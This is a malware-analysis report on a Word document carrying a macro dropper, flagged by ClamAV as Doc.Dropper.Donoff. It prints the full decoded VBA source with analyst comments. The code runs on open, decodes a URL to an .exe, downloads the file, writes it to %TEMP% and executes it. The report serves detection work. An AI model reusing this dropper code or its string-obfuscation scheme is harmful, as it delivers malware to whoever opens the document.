MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros that trigger on document open, utilizing WScript.Shell and CreateObject to execute arbitrary code. This strongly suggests the document is a dropper designed to download and execute a secondary payload, as indicated by the ClamAV detection 'Doc.Dropper.Donoff-5743530-0'. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPT — WScript.Shell usage. Matched line in script:
Dim HYZoDRudI As Integer Set XETrTRXL = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call. Matched line in script:
Dim sXMzCyPBRE As Boolean Set bZiQEUoAX = CreateObject("ADODB.Stream") End Function -
CallByName call high OLE_VBA_CALLBYNAME — CallByName call. Matched line in script:
Dim pdxxPHSfW As Integer, kTRGfWEy As Integer uvdSnC = CallByName(mdSgn, WTYaj, 2) End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPEN — Document_Open macro. Matched line in script:
Attribute VB_Customizable = True Private Sub Document_Open() Dim sWZeXmspMZ As Boolean -
Reference to Windows Script Host high SC_STR_WSCRIPT — Reference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body); this is the standard OOXML DrawingML namespace URI, not a network indicator.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7477 bytes |
SHA-256: da40084128e34dee80523ab81011de09ee853921503c4e2f1ba8e49a338a1c4f
Detection
ClamAV:
No threats found (for the carved macro source itself; the Doc.Dropper.Donoff-5743530-0 signature above matched the parent document)
Obfuscation or payload:
likely
123 of 194 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
|
|||
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Analyst notes (olevba-decoded source; modules are concatenated, each starts at an
' "Attribute VB_Name" line). This is the document-class module, i.e. the auto-exec entry.
' Document_Open fires when the document is opened and immediately hands control to the
' pNgavmiEKJ module. The local Boolean is declared but never used (filler).
Private Sub Document_Open()
Dim sWZeXmspMZ As Boolean
pNgavmiEKJ.gFfmUVs
End Sub
' Never referenced from Document_Open's call chain, and both callees (RdzCgNLfo, cdVmY)
' are not defined anywhere in this listing — dead filler added to pad the module.
Private Sub fiajFHZsQ()
RdzCgNLfo "HktK", "y9xGo", False
cdVmY 1519, False, True
End Sub
Attribute VB_Name = "TtcIaXa"
' --- Analyst notes: helper module used by the string decoder in qlpiGK. Only XHESS and
' NcgIWIQvgK are reached; the two Private Subs are unreferenced filler whose callees are not
' defined in this listing.
Private Sub jESbkyhpJ(ByVal xSOLF As String)
cUAGYTZsVc 1225, 2737, "Ns0Rg"
eeccmroa 8244
sIezp
qjETUiCBEo 1195, "ivN1", "y8J"
End Sub
' Returns the single character at 1-based position GGqKPKJrex of fmCfWeSIcR (Mid wrapper).
' KcvPasUi is declared and never used.
Public Function XHESS(ByVal GGqKPKJrex As Integer, ByVal fmCfWeSIcR As String) As String
Dim KcvPasUi As Boolean
XHESS = Mid(fmCfWeSIcR, GGqKPKJrex, 1)
End Function
' Unreferenced filler; yqdpRWtCu is not defined in this listing.
Private Sub NKHVta(ByVal MCXmSWbhc As String)
yqdpRWtCu
End Sub
' True when gHcvgocwY occurs anywhere in yOOFbERKq: InStr returns the 1-based position (0 if
' absent) and the non-zero/zero result is coerced to the Boolean return. The middle parameter
' NzkNKHftg and both local Strings are never used — decoys.
Public Function NcgIWIQvgK(ByVal gHcvgocwY As String, ByVal NzkNKHftg As String, ByVal yOOFbERKq As String) As Boolean
Dim VnIBA As String
Dim PBvML As String
NcgIWIQvgK = InStr(1, yOOFbERKq, gHcvgocwY)
End Function
Attribute VB_Name = "qlpiGK"
' --- Analyst notes: this module is the whole obfuscation scheme. RiYKggL(text, junk) walks
' text one character at a time and keeps only the characters that do NOT appear in junk, so
' every obfuscated literal in the sample is just "plaintext with filler characters inserted".
' Decoding any literal by hand: delete every character that is in the second argument.
' The uJCPXVWw call passed as the middle argument is evaluated and then ignored by the callee;
' XQUKUIlGS and the two String locals are never read (filler, no Option Explicit in effect).
Public Function RiYKggL(ByVal gcFsEfv As String, ByVal cEfbjz As String) As String
Dim OtAqQxMv As Boolean
Dim SdPdCiw As String, IBGFmd As String
For pvWGCLgX = 1 To Len(gcFsEfv)
' OtAqQxMv = "is this character one of the junk characters?"
OtAqQxMv = TtcIaXa.NcgIWIQvgK(TtcIaXa.XHESS(pvWGCLgX, gcFsEfv), uJCPXVWw, cEfbjz)
If Not OtAqQxMv Then
XQUKUIlGS = 9746
RiYKggL = RiYKggL & TtcIaXa.XHESS(pvWGCLgX, gcFsEfv)
End If
Next
End Function
' Constant string passed into (and ignored by) NcgIWIQvgK; IkmTucyV is an unused global write.
Private Function uJCPXVWw() As String
IkmTucyV = ""
uJCPXVWw = "2WJnP"
End Function
Attribute VB_Name = "tIvJlZJvF"
' --- Analyst notes: late-binding dispatch module. Every COM interaction in the sample goes
' through CallByName so that method/property names never appear as plain tokens in the source
' (they are decoded at runtime by qlpiGK.RiYKggL). The numeric third argument is the VBA
' CallType: 1 = VbMethod, 2 = VbGet, 4 = VbLet. Detection note: CallByName with a decoded
' name plus a CreateObject'd WScript.Shell / ADODB.Stream / XMLHTTP object is the pattern to
' alert on; the many unused Integer/Boolean locals are padding.
' Property GET of WTYaj on mdSgn (CallType 2), returned as Variant. CfOzRoZGun and VgCqVQCru
' are never used.
Public Function uvdSnC(ByVal mdSgn As Object, ByVal CfOzRoZGun As String, ByVal WTYaj As String, ByVal VgCqVQCru As Integer) As Variant
Dim pdxxPHSfW As Integer, kTRGfWEy As Integer
uvdSnC = CallByName(mdSgn, WTYaj, 2)
End Function
' METHOD call (CallType 1) of PvlzazUfA on GBtVkMkQ with two arguments. Note the argument
' order: HaGNDmv is passed first, tpyGbdoEQj second (the reverse of the parameter order).
Public Sub aeAafPvM(ByVal PvlzazUfA As String, ByVal tpyGbdoEQj As Variant, ByVal HaGNDmv As Variant, ByVal GBtVkMkQ As Object)
Dim lHmBuq As String
CallByName GBtVkMkQ, PvlzazUfA, 1, HaGNDmv, tpyGbdoEQj
End Sub
' Unreferenced filler; HTXti is not defined in this listing.
Private Function rtWcGCOGDg() As Boolean
HTXti "tgYI"
rtWcGCOGDg = False
End Function
' Property GET (CallType 2) of QSCuS on cvgpWXl with one argument BeAJg; the result is
' object-assigned (Set), so callers expect a COM object back.
Public Function MFFQv(ByVal BeAJg As String, ByVal QSCuS As String, ByVal cvgpWXl As Object) As Variant
Dim JBfjk As Boolean
Dim AzQjSLoU As Boolean
Set MFFQv = CallByName(cvgpWXl, QSCuS, 2, BeAJg)
End Function
' METHOD call (CallType 1) of BcimJzTXxI on zZDIBErBe with a single argument ZpLhgd.
' zYwmBjKdA is ignored.
Public Sub ofQEagNCR(ByVal zYwmBjKdA As Boolean, ByVal BcimJzTXxI As String, ByVal zZDIBErBe As Object, ByVal ZpLhgd As Variant)
Dim sbMoAZE As Integer
Dim LOkAk As Integer
CallByName zZDIBErBe, BcimJzTXxI, 1, ZpLhgd
End Sub
' Unreferenced filler; NvOKlpusE and aVtapbVnl are not defined in this listing.
Private Sub huWOw(ByVal XshmLCte As Boolean)
NvOKlpusE
aVtapbVnl "", 1093, 9096
End Sub
' Unreferenced filler; its callees are not defined in this listing.
Private Function QqZeLOBHL() As Integer
nCnktKv False
hCCQENhD 3748, 2598, "BWQ"
CGgZkEaFBc
QqZeLOBHL = 1258
End Function
' Property LET (CallType 4): sets property oegby on WVZkUPnPQy to dngYyt. The Integer and
' second String parameters are ignored.
Public Sub ETZlueM(ByVal ffzrOMlAl As Integer, ByVal oegby As String, ByVal dngYyt As Variant, ByVal yYMpHBuEO As String, ByVal WVZkUPnPQy As Object)
CallByName WVZkUPnPQy, oegby, 4, dngYyt
End Sub
' Unreferenced filler; gOZso is not defined in this listing.
Private Function BDIyEQNA(ByVal pVGKTKG As String) As Boolean
gOZso 1884
BDIyEQNA = True
End Function
' METHOD call (CallType 1) of aPcNqh on jFLQYI with no arguments. kayWGvM is an unused
' global write.
Public Sub nDXWgVaB(ByVal jFLQYI As Object, ByVal aPcNqh As String)
Dim HJKDWFSbK As Integer
Dim qkZxzUw As Integer
kayWGvM = ""
CallByName jFLQYI, aPcNqh, 1
End Sub
Attribute VB_Name = "yxAzCBpe"
' --- Analyst notes: object factory. The three CreateObject ProgIDs are the only un-obfuscated
' indicators in the sample and together describe the dropper: an HTTP client to fetch a file,
' a binary stream to write it to disk, and a shell object to execute it. Each unused local is
' padding. QufpcZdA is unreferenced filler whose callees are not defined in this listing.
' ADODB.Stream — used later (rrQumoYv) to write the downloaded bytes to a file.
Public Function bZiQEUoAX() As Object
Dim sXMzCyPBRE As Boolean
Set bZiQEUoAX = CreateObject("ADODB.Stream")
End Function
' WScript.Shell — used for the environment lookup (JzEfZof) and the final execution (ppkHpIx).
Public Function XETrTRXL() As Object
Dim HYZoDRudI As Integer
Set XETrTRXL = CreateObject("WScript.Shell")
End Function
' MSXML2.ServerXMLHTTP.6.0 — used for the download (aJBkAaphH). ServerXMLHTTP does not use the
' WinINET/IE proxy settings, which is worth knowing when reproducing the traffic in a sandbox.
Public Function aJIfxJZodD() As Object
Dim AiSqstM As String
Set aJIfxJZodD = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Function QufpcZdA() As Integer
YRcIVIcog
zzTmoaeZe False, ""
ngYFxDZeTQ False, 7239, ""
QufpcZdA = 7668
End Function
Attribute VB_Name = "pNgavmiEKJ"
' --- Analyst notes: the payload logic. Reachable call chain from Document_Open:
'   gFfmUVs -> YUSZTLp -> aJBkAaphH (HTTP GET, read ResponseBody)
'                       -> rrQumoYv  (ADODB.Stream: Type=1, Open, Write, SaveToFile, Close)
'                       -> ppkHpIx   (WScript.Shell method decoded from PGEJFjiOIP)
' i.e. download -> write to %TEMP% -> execute, matching T1105 / T1204.002 in the report header.
' Every string below is decoded with qlpiGK.RiYKggL by deleting the characters listed in its
' second argument; the decoded values given in comments were obtained that way and should be
' re-derived before being used as IoCs. All the other Private Subs/Functions that call names
' not defined in this listing are unreferenced filler.
' Download URL. Stripping 'E', 'S' and '1' yields an http:// URL whose path ends in .exe —
' the second-stage location. qAgGuRAod is an unused global write.
Private Function EomLao() As String
qAgGuRAod = 7052
EomLao = qlpiGK.RiYKggL("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1")
End Function
' Execution step: invokes the WScript.Shell method named by PGEJFjiOIP (decodes to "Exec")
' with YnuZrPfbaC — the dropped file path — as its single argument.
Private Sub ppkHpIx(ByVal YnuZrPfbaC As String)
Dim Pyqsuj As Integer
MDpGo = "kBmv"
tIvJlZJvF.ofQEagNCR True, PGEJFjiOIP, yxAzCBpe.XETrTRXL, YnuZrPfbaC
End Sub
' Entry point called from ThisDocument.Document_Open; just forwards to YUSZTLp.
Public Sub gFfmUVs()
cKAIKaerq = ""
YUSZTLp
End Sub
' Constant passed as the ignored 4th argument of ETZlueM.
Private Function cQrOaLqaF() As String
cQrOaLqaF = "pyHY"
End Function
' Drop path: value of the process environment variable whose name decodes to "TEMP",
' concatenated with the file name from zVFSzCf.
Private Function rPeqnQcyK() As String
Dim eEhHa As Integer
rPeqnQcyK = JzEfZof(qlpiGK.RiYKggL("eTJEoMPe", "eJo")) & zVFSzCf
End Function
' Decodes to "ResponseBody" — the XMLHTTP property read after Send (raw bytes of the download).
Private Function WNqBeL() As String
WNqBeL = qlpiGK.RiYKggL("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx")
End Function
' Constant passed as the ignored 4th argument of aJBkAaphH.
Private Function NhnSmVlON() As String
NhnSmVlON = "Vb0T7"
End Function
' Download step. GBZskde = destination path, lxYJsBCX = URL; sIPyuadE and gUaDB are ignored.
' Open(<"GET">, url, False) is synchronous; then Send (via nDXWgVaB) and the ResponseBody is
' read through uvdSnC (property get) and handed to rrQumoYv for writing to disk. oxUnFM is an
' undeclared global holding the ServerXMLHTTP object.
Private Sub aJBkAaphH(ByVal sIPyuadE As Integer, ByVal GBZskde As String, ByVal lxYJsBCX As String, ByVal gUaDB As String)
Dim TaULKEoJ As String, ZyPTWCYq As Integer
Set oxUnFM = yxAzCBpe.aJIfxJZodD
oxUnFM.Open DhDnlIsSB, lxYJsBCX, False
tIvJlZJvF.nDXWgVaB oxUnFM, qlpiGK.RiYKggL("PSeYbndb", "bPY")
rrQumoYv False, GBZskde, "yR0", tIvJlZJvF.uvdSnC(oxUnFM, "KP", WNqBeL, 1945)
End Sub
' Decodes to "Close" (ADODB.Stream method).
Private Function hHCstF() As String
hHCstF = qlpiGK.RiYKggL("CRlAoRsAAe", "ERNA")
End Function
' Indirection for the URL (EomLao).
Private Function cKNQjiDW() As String
Dim pOrRFib As Integer
cKNQjiDW = EomLao
End Function
Private Sub CEGmN()
JPvLzyRGsx 7449
NURQhgJR
bFqvCc False, True, 9563
qjMaTOIxQi
End Sub
' Indirection for the dropped file name (YTtJZVQK).
Private Function zVFSzCf() As String
Dim jbmFfpJi As String
Dim YdVNBik As Integer
zVFSzCf = YTtJZVQK
End Function
' Orchestrator. "On Error GoTo lesJtbZS" with an empty handler means any failure (no network,
' blocked ProgID, write error) is swallowed silently — in a sandbox with no egress the macro
' simply ends without side effects, so absence of a dropped file is not evidence of benignity.
' The assignment after Exit Sub is unreachable filler.
Private Sub YUSZTLp()
On Error GoTo lesJtbZS
aJBkAaphH 5708, rPeqnQcyK, cKNQjiDW, NhnSmVlON
ieHcrIl = "BsVc4"
ppkHpIx rPeqnQcyK
Exit Sub
QIGVmfY = "4u"
lesJtbZS:
End Sub
' Dropped file name: stripping 'S','j','g','k','r' leaves a '/'-prefixed .exe file name that is
' appended to %TEMP%. IFLCzb is an unused global write.
Private Function YTtJZVQK() As String
IFLCzb = True
YTtJZVQK = qlpiGK.RiYKggL("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr")
End Function
Private Function LtgcPJUr(ByVal TZigq As Integer, ByVal BkXNoxybM As Boolean) As String
ICxOAIJEjl
JDQNlwwUu
ubsRjN True
LtgcPJUr = ""
End Function
Private Function fgsPwk(ByVal quCugkfEx As Boolean) As Boolean
If NACpLN("SzbAB", "hv") Then
GbhxArF
Halxgk
End If
nDkOinXoNp
SclaOvXM 3912, False, "zW3X"
SFyHb
fgsPwk = False
End Function
Private Sub xqHViadvzm()
aBDhFcyR "", "FFpd"
End Sub
' Decodes to "GET" — the HTTP verb for XMLHTTP.Open. bwVhN is an unused global write.
Private Function DhDnlIsSB() As String
bwVhN = 9168
DhDnlIsSB = qlpiGK.RiYKggL("GHZEjT", "4jZc0H")
End Function
' Decodes to "Open" (ADODB.Stream method).
Private Function rdpYgruZts() As String
rdpYgruZts = qlpiGK.RiYKggL("wOpWeinw", "wiW")
End Function
' Decodes to "Exec" — the WScript.Shell method used in ppkHpIx to run the dropped file.
Private Function PGEJFjiOIP() As String
mVMPpQPeMQ = 3401
PGEJFjiOIP = qlpiGK.RiYKggL("jE0xe0jc", "jWh60f")
End Function
' Write-to-disk step. PsZYlZhJp = destination path, Cdyuk = response bytes; cNMdym and
' XBbWWJWuh are ignored. Sequence on the ADODB.Stream (jFBKbfZja, undeclared global):
'   .Type = 1 (adTypeBinary)            -> ETZlueM (property let, name from WCCYnnYfik)
'   .Open                               -> nDXWgVaB (name from rdpYgruZts)
'   .Write bytes                        -> ofQEagNCR (name decodes to "Write")
'   .SaveToFile path, 2 (adSaveCreateOverWrite) -> aeAafPvM (name decodes to "SaveToFile";
'                                          aeAafPvM passes its 3rd param first, hence path, 2)
'   .Close                              -> nDXWgVaB (name from hHCstF)
Private Sub rrQumoYv(ByVal cNMdym As Boolean, ByVal PsZYlZhJp As String, ByVal XBbWWJWuh As String, ByVal Cdyuk As Variant)
Dim RztyfS As String
Set jFBKbfZja = yxAzCBpe.bZiQEUoAX
bZfJcN = 978
tIvJlZJvF.ETZlueM 654, WCCYnnYfik, 1, cQrOaLqaF, jFBKbfZja
tIvJlZJvF.nDXWgVaB jFBKbfZja, rdpYgruZts
tIvJlZJvF.ofQEagNCR True, qlpiGK.RiYKggL("Wbr3i0OtOe", "b3O0"), jFBKbfZja, Cdyuk
tIvJlZJvF.aeAafPvM qlpiGK.RiYKggL("hSaGhverTGhoFGrilGeG", "rhG"), 2, PsZYlZhJp, jFBKbfZja
tIvJlZJvF.nDXWgVaB jFBKbfZja, hHCstF
End Sub
' Environment lookup: the two literals decode to "PROCESS" and "Environment", so ikHNExdC is
' WScript.Shell.Environment("PROCESS") obtained via property get; indexing it with EjQEYb
' returns that process environment variable's value (used to resolve TEMP).
Private Function JzEfZof(ByVal EjQEYb As String) As String
Set ikHNExdC = tIvJlZJvF.MFFQv(qlpiGK.RiYKggL("rPrROFCr0ErSFS", "r0F"), qlpiGK.RiYKggL("EWwn vi ro00n0mwenWtw", "Ww0 "), yxAzCBpe.XETrTRXL)
ZcTzOUAO = False
JzEfZof = ikHNExdC(EjQEYb)
End Function
' Decodes to "Type" (ADODB.Stream property set to 1 = binary in rrQumoYv).
Private Function WCCYnnYfik() As String
WCCYnnYfik = qlpiGK.RiYKggL("TPyPlpe1", "1lmPs")
End Function
|
|||